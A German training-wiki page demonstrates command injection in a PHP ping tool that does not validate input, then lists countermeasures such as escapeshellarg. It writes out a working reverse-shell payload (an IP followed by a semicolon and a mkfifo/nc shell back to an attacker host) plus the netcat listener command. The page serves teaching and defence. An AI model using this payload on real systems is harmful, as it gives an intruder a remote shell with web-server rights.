Command Injection Proof of Concept

Aus Xinux Wiki

Version vom 28. Juni 2021, 07:55 Uhr von Tina.messmann (Diskussion | Beiträge) (→‎Gegenmassnahmen)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

PHP Code

Bei dieser Anwendung wird die Eingabe nicht verifiziert.
Man hinter die IP Adresse mit einem Semikolon weitere Kommandos anhängen.
Diese Kommandos werden dann mit den Rechten des Webservers ausgeführt.
In diesem Fall führen wir eine Remote Shell aus.

Angreifer

netcat -lp 8668

Schadcode einbringen

1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe

Auf dem Angreifer

Gegenmassnahmen

Niemals Daten von Aussen ungeprüft in Anwendungen verwenden.
Verwendung von entsprechenden Funktionen der benutzten Programmiersprache / Scriptsprache.
PHP-Funktion escapeshellarg zur Maskierung einer Zeichenkette zur weiteren Verwendung als Shell-Argument:

$cmd = 'ping -c 4 ' . escapeshellarg($ip);

ping -c 4 '1.1.1.1; ls'

Abgerufen von „http://wiki.ixheim.de/index.php?title=Command_Injection_Proof_of_Concept&oldid=25181“